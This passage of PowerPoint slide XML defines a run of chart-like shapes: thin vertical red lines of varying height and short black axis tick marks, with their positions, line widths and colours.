            <a:ext cx="0" cy="850642"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="429260">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="429163"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="object 511"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7107410" y="5133516"/>
            <a:ext cx="0" cy="856933"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="432435">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="432165"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="object 512"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7127641" y="3570449"/>
            <a:ext cx="0" cy="2417288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1219835">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1219434"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="object 513"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7127641" y="3567474"/>
            <a:ext cx="0" cy="2423579"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1223010">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1222436"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="object 514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7147473" y="4431217"/>
            <a:ext cx="0" cy="1556577"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="785494">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="785065"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="object 515"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7147473" y="4428240"/>
            <a:ext cx="0" cy="1562869"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="788669">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="788068"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="object 516"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7187536" y="3998056"/>
            <a:ext cx="0" cy="1989449"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1003935">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1003651"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="object 517"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7187536" y="3995080"/>
            <a:ext cx="0" cy="1995741"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1007110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1006653"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="object 518"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207368" y="3520470"/>
            <a:ext cx="0" cy="2467622"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1245235">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1244655"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="object 519"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207368" y="3517496"/>
            <a:ext cx="0" cy="2472655"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1247775">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1247658"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="object 520"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227203" y="4203529"/>
            <a:ext cx="0" cy="1784338"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="900430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="899963"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="object 521"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7227203" y="4200555"/>
            <a:ext cx="0" cy="1789370"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="902969">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="902965"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="object 522"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7167307" y="2831855"/>
            <a:ext cx="0" cy="3155938"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1592580">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1592150"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="object 523"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7167307" y="2828882"/>
            <a:ext cx="0" cy="3162230"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1595755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1595152"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="object 524"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2155023" y="5008761"/>
            <a:ext cx="0" cy="978995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="494030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="493619"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="object 525"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2155023" y="5005787"/>
            <a:ext cx="0" cy="985287"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="497205">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="496621"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="object 526"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052684" y="5431609"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42035" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="object 527"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052684" y="4876275"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42035" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="object 528"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052684" y="4320943"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42035" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="object 529"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052684" y="3765609"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42035" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="object 530"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052684" y="3210275"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42035" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="object 531"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052684" y="2654941"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42035" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="object 532"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052684" y="2099609"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42035" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="object 533"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264887" y="5986943"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545">
                <a:moveTo>
                  <a:pt x="42035" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="object 534"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264887" y="5431609"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545">
                <a:moveTo>
                  <a:pt x="42035" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="object 535"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264887" y="4876275"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545">
                <a:moveTo>
                  <a:pt x="42035" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="object 536"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264887" y="4320943"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545">
                <a:moveTo>
                  <a:pt x="42035" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="object 537"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264887" y="3765609"/>
            <a:ext cx="84309" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42545">
                <a:moveTo>
                  <a:pt x="42035" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
